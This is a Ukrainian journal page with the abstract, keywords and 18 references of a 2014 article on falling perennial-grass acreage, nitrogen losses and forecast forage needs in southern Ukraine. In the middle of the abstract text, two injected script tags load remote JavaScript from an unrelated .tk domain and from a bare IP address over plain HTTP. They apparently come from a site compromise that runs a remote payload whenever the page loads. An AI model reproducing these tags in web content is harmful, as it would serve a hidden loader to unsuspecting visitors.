ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:633.2(477.7)
Сторінка молодого науковця

Об’єктивна необхідність оптимізації площ багаторічних трав у сільськогосподарських підприємствах Півдня України / Цуркан Н. В. // Економіка АПК. - 2014. - № 6 - С. 66

Проаналізовано стан розвитку виробництва продукції багаторічних трав у сільськогосподарських підприємствах Півдня України в ретроспективі, зокрема встановлено скорочення площ під цими культурами в усіх регіонах південного Степу. Зазначено недотримання науково обґрунтованих норм щодо структури сівозміни, а саме –значне розширення площ під технічними культурами, у тому числі соняшником. Розраховано втрати екологічно чистого азоту у вартісному виразі за зменшення площ під багаторічними травами. Використовуючи методи статистичного аналізу, виявлено тенденції й розраховано прогноз розміру посівних площ під досліджуваними культурами та поголів’я великої рогатої худоби на перспективу до 2020 року. Враховуючи потребу цих тварин в обмінній енергії кормів, одержано дані про необхідний розмір площ багаторічних трав, який водночас відповідатиме науковим нормам. Обґрунтовано необхідність як інтенсивного, так і екстенсивного розвитку виробництва досліджуваної продукції. Табл.: 2. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: багаторічні трави, площа посіву, структура, прогнозований рівень, родючість ґрунту, втрати екологічно чистого азоту, конкурентоспроможність, рентабельність

Список використаних джерел

 1. Антипова Л.К. Виробництво насіння люцерни в Степу України: моногр. / Л.К. Антипова. – Миколаїв: МДАУ, 2009. — 228 с.
 2. Бабич-Побережна А.А. Кормовиробництво у контексті євроінтеграційного курсу України / А.А. Бабич-Побережна, Л.Г. Ройченко, В.С. Мацютевич // Корми і кормовиробництво. – 2008. – Вип. 63. – С. 280-283.
 3. Кіщак І.Т. Становлення та ефективне функціонування ринку кормових ресурсів: моногр. / І.Т. Кіщак. – Миколаїв: Вид-во «Іліон», 2004. – 280 с.
 4. Норми годівлі, раціони і поживність кормів для різних видів сільськогосподарських тварин : довідник / [Г.В. Проваторов, В.І. Ладика, Л.В. Бондарчук; за заг. ред. В.О. Проваторова]. – 2-ге вид., стер. – Суми: Університетська книга, 2009. – 490 с.
 5. Павлов О.І. Агропродовольча сфера України як об’єкт національної безпеки / О.І. Павлов // Економіка АПК. – 2014. – № 2. – С. 97-103.
 6. Петриченко В.Ф. Польове травосіяння в системі конвеєрного виробництва кормів в Україні / В.Ф. Петриченко, Г.П. Квітко // Вісн. аграр. науки. – 2004. – № 3. – С. 30—32.
 7. Саблук П.Т. Аграрна реформа в Україні (здобутки, проблеми і шляхи їх вирішення) / П.Т. Саблук, В.Я. Месель-Веселяк, М.М. Федоров // Економіка АПК. – 2009. – № 12. – С. 3-13.
 8. Стратегічні напрями розвитку сільського господарства України на період до 2020 року; за ред. Ю.О. Лупенка, В.Я. Месель-Веселяка. – К.: ННЦ “ІАЕ”, 2012. – 182 с.
 9. Топіха І.Н. Економіка аграрних підприємств: курс лекцій / І.Н. Топіха. – Миколаїв: Видавничий відділ МДАУ, 2005. – 318 с.
 10. Цуркан Н.В. Стан і тенденції розвитку виробництва багаторічних трав у південному Степу України / Н.В. Цуркан // Корми і кормовиробництво. – 2012. — № 74. – С. 48-52.
 11. Червен І.І. Нормативно-методична база прогнозування і комплексної оцінки ефективності польових сівозмін для фермерських господарств / І.І. Червен, В.П. Шкумат, Т.В. Порудєєва: навч.-метод. вид. – Миколаїв, 2008. – 54 с. –(Методичні рекомендації).
 12. Шпикуляк О.Г. Проблеми економічних відносин в механізмі ціноутворення аграрного ринку / О.Г. Шпикуляк // Економіка АПК. – 2009. – № 10. – С. 77-82.
 13. El cultivo de la alfalfa en aragón. Recientes ensayos sobre variedades [Електронний ресурс] // Informaciones técnicas / Режим доступу: http://www.2.cita-aragon.es.
 14. Vance C.Н., Heichel G.H., Phillips D.A., Nodulation and symbiotic dinitrogen fixation. En: Alfalfa and alfalfa improvement, Hanson A.A., Ed., Agronomy nº 29, Madison, Wisconsin, USA, 1988. – Р. 229-257.
 15. Rasma Platače. Аssessment of perennial crop areas in Latvia and Ukraine / Rasma Platače, NataliaTsurkan, Liena Poiša, Aleksandrs Adamovičs, Kristīne Ivanova // “The changing economic landscape : issues, implications and policy options”. – Fwd : Нorvaatija, 2013. – C. 97.
 16. Sieinshamn H. Effect of pasture type compared with hay diet on dairy goat milk production and quality / H. Sieinshamn., R. Ungstad, M. Nvmo and M. Mrgensen // Grassland Science in Europe. Proceedings of the 24th General Meeting of the European Grassland Federation. Lublin, Poland 3-7 june 2012. – Oficyna Wydawnicza Garmond. Poznan, 2012. – Vol. 17. – P. 408-409.
 17. Suokannas A. Loader wagon compared to metered chopper for forage harvest / A. Suokannas and M. Nysand // Grassland Science in Europe 13. – 2008. – Р. 648-650.
 18. Kolbe H. Feldfutterbau und Gründüngung im Ökologischen Landbau. Informationen für Praxis und Beratung [Електронний ресурс] / H. Kolbe und al. – Großpösna: Fischer Druck, 2006 / Режим доступу: http://orgprints.org/15102/1/Feldfutter.pdf.
Читати статтю: 14_06_66-70.pdf
Читати переклад статті: 1406tsurkan.pdf